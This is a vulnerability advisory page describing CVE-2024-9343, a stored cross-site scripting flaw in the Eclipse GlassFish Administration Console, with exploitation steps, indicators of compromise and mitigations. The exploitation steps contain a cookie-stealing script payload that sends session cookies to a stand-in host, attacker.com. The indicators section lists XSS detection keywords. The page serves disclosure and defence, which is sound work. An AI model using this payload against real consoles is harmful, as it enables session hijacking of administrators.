CVE-2024-9343:
Java Análisis y mitigación de vulnerabilidades
Vista general
CVE-2024-9343 is a Stored Cross-Site Scripting (XSS) vulnerability in the Administration Console of Eclipse GlassFish version 7.0.15. It allows an attacker with high privileges to inject malicious scripts that are persistently stored and executed when other administrators access the console. The affected Maven package is org.glassfish.main.admingui:console-common, with versions up to and including 7.0.25 listed as affected with no patched version currently identified. It was published on July 16, 2025, with a CVSS v3.1 base score of 6.1 (Medium) and a CVSS v4.0 base score of 6.1 (Medium) (GitHub Advisory, Red Hat CVE).
Técnicas
The root cause is improper neutralization of user-controllable input before it is rendered in web pages served to other users (CWE-79). An authenticated attacker with administrative privileges can inject malicious JavaScript into fields within the GlassFish Administration Console; the payload is stored server-side and executed in the browsers of other administrators who subsequently visit the affected console pages. The attack vector is network-based, requires high privileges to inject the payload, and requires passive user interaction (another admin visiting the page) to trigger execution. The Eclipse security issue tracker references are available at https://gitlab.eclipse.org/security/cve-assignement/-/issues/37 and https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/230 (GitHub Advisory).
Impacto
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of other administrators accessing the GlassFish Administration Console, potentially leading to theft of administrative session credentials, unauthorized manipulation of console settings, and unauthorized actions within the GlassFish administration interface. The CVSS v4.0 scoring reflects a high subsequent system confidentiality impact, indicating that downstream systems accessible via the admin console could be exposed. Availability is not directly impacted, but the integrity and confidentiality of the administration environment are at risk (GitHub Advisory, Red Hat CVE).
Pasos de explotación
- Gain Administrative Access: Obtain valid credentials for the Eclipse GlassFish Administration Console (typically accessible on port 4848). This requires high-privilege access, either through credential theft, reuse, or social engineering.
- Identify Injectable Fields: Navigate the Administration Console to locate input fields that are stored and later rendered without proper output encoding (e.g., resource names, JNDI names, or configuration fields).
- Inject Malicious Payload: Submit a stored XSS payload such as
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>into a vulnerable input field and save the configuration. - Wait for Victim Interaction: When another administrator browses to the affected console page, the stored script executes in their browser context.
- Harvest Credentials or Perform Actions: The executed script can exfiltrate session cookies, perform actions on behalf of the victim administrator, or redirect them to a phishing page (GitHub Advisory).
Indicadores de compromiso
- Network: Outbound HTTP requests from administrator browsers to unexpected external domains shortly after accessing the GlassFish Administration Console; unusual GET/POST requests containing encoded JavaScript or cookie data to attacker-controlled infrastructure.
- Logs: GlassFish Administration Console access logs showing unusual input values containing HTML tags or JavaScript keywords (
<script>,onerror,javascript:) in configuration fields; repeated access to specific console pages by multiple admin accounts in short succession. - File System: Unexpected modifications to GlassFish configuration files or stored resource definitions containing script tags or encoded payloads.
- Browser/Session: Unexplained administrative actions (resource creation, configuration changes) in audit logs not correlated with known administrator activity, potentially indicating session hijacking (GitHub Advisory).
Mitigación y soluciones alternativas
The GitHub Advisory identifies versions up to and including 7.0.25 as affected with no patched version currently listed; users should monitor the Eclipse GlassFish release page for a fix and upgrade as soon as one is available (GitHub Advisory). In the interim, restrict access to the GlassFish Administration Console (port 4848) to trusted IP addresses only, implement strong multi-factor authentication for administrative accounts, and deploy a Web Application Firewall (WAF) with XSS detection rules. Additionally, review and audit all stored configuration values in the Administration Console for unexpected script content, and monitor administrative console logs for suspicious activity (Red Hat CVE).
Recursos adicionales
Fuente: Este informe se generó utilizando IA
Relacionado Java Vulnerabilidades:
Evaluación gratuita de vulnerabilidades
Compare su postura de seguridad en la nube
Evalúe sus prácticas de seguridad en la nube en 9 dominios de seguridad para comparar su nivel de riesgo e identificar brechas en sus defensas.
Recursos adicionales de Wiz
Obtén una demostración personalizada
¿Listo para ver a Wiz en acción?
"La mejor experiencia de usuario que he visto en mi vida, proporciona una visibilidad completa de las cargas de trabajo en la nube."
"Wiz proporciona un panel único para ver lo que ocurre en nuestros entornos en la nube."
"Sabemos que si Wiz identifica algo como crítico, en realidad lo es."